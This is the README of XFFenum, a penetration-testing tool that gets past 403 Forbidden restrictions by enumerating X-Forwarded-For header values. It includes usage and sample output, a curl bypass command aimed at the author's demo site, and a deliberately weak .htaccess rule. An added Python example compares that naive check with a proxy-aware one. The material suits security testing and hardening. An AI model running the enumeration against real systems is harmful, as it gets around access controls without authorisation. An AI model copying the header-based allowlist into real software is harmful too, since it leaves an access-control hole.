Ecosyste.ms: Awesome

https://github.com/vavkamil/XFFenum

X-Forwarded-For [403 forbidden] enumeration

README

# XFFenum

A simple tool for bypassing 403 Forbidden endpoints behind load balancers (e.g. Cloudflare) by enumerating candidate values of the X-Forwarded-For header.

Based on [enumXFF](https://github.com/infosec-au/enumXFF) by @infosec_au.

### Example

```
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -u https://xss.vavkamil.cz/xff -i 192.168.0.0/16
__  _______ _____
\ \/ /  ___|  ___|__ _ __  _   _ _ __ ___
 \  /| |_  | |_ / _ \ '_ \| | | | '_ ` _ \
 /  \|  _| |  _|  __/ | | | |_| | | | | | |
/_/\_\_|   |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumeration

[i] Using URL: https://xss.vavkamil.cz/xff
[i] Using IP range: 192.168.0.0/16
[i] IP addresses in range: 65536
[i] Iterations required: 13108

673it [00:34, 21.69it/s]

[!] Access granted with 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41
[!] curl https://xss.vavkamil.cz/xff -H "X-Forwarded-For: 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41"
```

#### Proof of Concept

```
vavkamil@localhost:~$ curl -i https://xss.vavkamil.cz/xff
HTTP/2 403
date: Wed, 07 Aug 2019 20:02:41 GMT
content-type: text/html; charset=iso-8859-1
set-cookie: __cfduid=d77da0ad10e7a360cce4a28311784c12d1565208161; expires=Thu, 06-Aug-20 20:02:41 GMT; path=/; domain=.vavkamil.cz; HttpOnly; Secure
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 502bd9832d69c2db-FRA

403 Forbidden

Forbidden

You don't have permission to access /xff on this server.

Apache/2.4.29 (Ubuntu) Server at xss.vavkamil.cz Port 80
```

##### .htaccess

```
Order Deny,Allow
Deny from all
SetEnvIf X-Forwarded-For "192.168.13.37" AllowAccess
Allow from env=AllowAccess
```
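The `.htaccess` above has two weaknesses that together explain the tool's output. First, `SetEnvIf` applies its pattern to the whole header value, so an allowed address appearing anywhere in the comma-separated list sets the variable; that is why several candidates can be packed into one request (65536 addresses in 13108 iterations, five per request). Second, and more fundamentally, X-Forwarded-For is written by whoever sends the request unless the TCP peer is a proxy the origin trusts, so matching on it is matching on attacker-controlled input. The following is an added example, not code from the XFFenum project, showing the naive check beside a resolver that only honours hops appended by a trusted proxy. The proxy range `203.0.113.0/24`, the peer addresses and the scenarios are constructed for the example; the whitelisted client `192.168.13.37` is the one from the `.htaccess` above.

```python
import ipaddress
from typing import List, Optional

# Constructed sample data (assumptions for this example, not values from the project):
# the load balancer's address range, standing in for a provider's published ranges,
# and the single client address the .htaccess above whitelists.
TRUSTED_PROXIES = [ipaddress.ip_network("203.0.113.0/24")]
ALLOWED_CLIENTS = [ipaddress.ip_network("192.168.13.37/32")]


def naive_is_allowed(xff_header: Optional[str]) -> bool:
    """The check the .htaccess above effectively performs.

    SetEnvIf applies its pattern to the whole header value, so an allowed
    address anywhere in the comma-separated list grants access, and the
    header itself is supplied by the requester.
    """
    if not xff_header:
        return False
    return any(str(net.network_address) in xff_header for net in ALLOWED_CLIENTS)


def _is_trusted_proxy(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def resolve_client_ip(remote_addr: str, xff_header: Optional[str]):
    """Return the address an access decision should use, or None to deny.

    The only fact the server knows is the TCP peer (remote_addr). X-Forwarded-For
    is honoured only when that peer is a trusted proxy, and then only the hops a
    trusted proxy appended count: walk the list from the right, skipping trusted
    proxies; the first untrusted hop is the client. Everything left of it is
    unverified input supplied by that client.
    """
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted_proxy(peer):
        return peer  # direct connection: the header is ignored entirely
    if not xff_header:
        return None  # a trusted proxy always adds the header; treat absence as an error

    hops = []
    for raw in xff_header.split(","):
        try:
            hops.append(ipaddress.ip_address(raw.strip()))
        except ValueError:
            return None  # malformed entry: fail closed rather than guess

    for hop in reversed(hops):
        if not _is_trusted_proxy(hop):
            return hop
    return None  # every hop is one of our own proxies: no external client to authorise


def strict_is_allowed(remote_addr: str, xff_header: Optional[str]) -> bool:
    client = resolve_client_ip(remote_addr, xff_header)
    return client is not None and any(client in net for net in ALLOWED_CLIENTS)


# Constructed request scenarios: (description, TCP peer, X-Forwarded-For as received).
SCENARIOS = [
    ("legitimate client via the load balancer",
     "203.0.113.10", "192.168.13.37"),
    ("direct connection, forged header",
     "198.51.100.7", "192.168.13.37"),
    ("via the load balancer; client forged the first entry, proxy appended the real peer",
     "203.0.113.10", "192.168.13.37, 198.51.100.7"),
    ("batched candidates in one header, as in the tool output above",
     "198.51.100.7", "192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41"),
]


def compare() -> List[dict]:
    """Evaluate both checks over the scenarios; one record per request."""
    return [
        {"case": desc, "naive": naive_is_allowed(xff), "strict": strict_is_allowed(peer, xff)}
        for desc, peer, xff in SCENARIOS
    ]


if __name__ == "__main__":
    for row in compare():
        print(f"{row['case']:<88} naive={row['naive']!s:<5} strict={row['strict']}")
```

Only the first scenario passes the strict check; the naive check passes all four. In Apache the same separation is what mod_remoteip provides (`RemoteIPHeader X-Forwarded-For` together with `RemoteIPTrustedProxy` for the load balancer's ranges), after which `Require ip` decides on the resolved client address rather than on the raw header; restricting the origin to accept connections only from the CDN closes the direct-connection case as well.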

### Usage

```
vavkamil@localhost:~/XFFenum$ python3 xffenum.py -h
__  _______ _____
\ \/ /  ___|  ___|__ _ __  _   _ _ __ ___
 \  /| |_  | |_ / _ \ '_ \| | | | '_ ` _ \
 /  \|  _| |  _|  __/ | | | |_| | | | | | |
/_/\_\_|   |_| \___|_| |_|\__,_|_| |_| |_|
X-Forwarded-For [403 forbidden] enumeration

usage: xffenum.py [-h] -u URL -i IP_RANGE [-t THREADS] [--no-verify-ssl]

X-Forwarded-For [403 forbidden] enumeration

optional arguments:
  -h, --help       show this help message and exit
  -u URL           Forbidden URL path to scan
  -i IP_RANGE      Single IP or range to use
  -t THREADS       number of threads (default: 5)
  --no-verify-ssl  Ignore any and all SSL errors.

Have a nice day :)
```

## References

- https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/
- https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html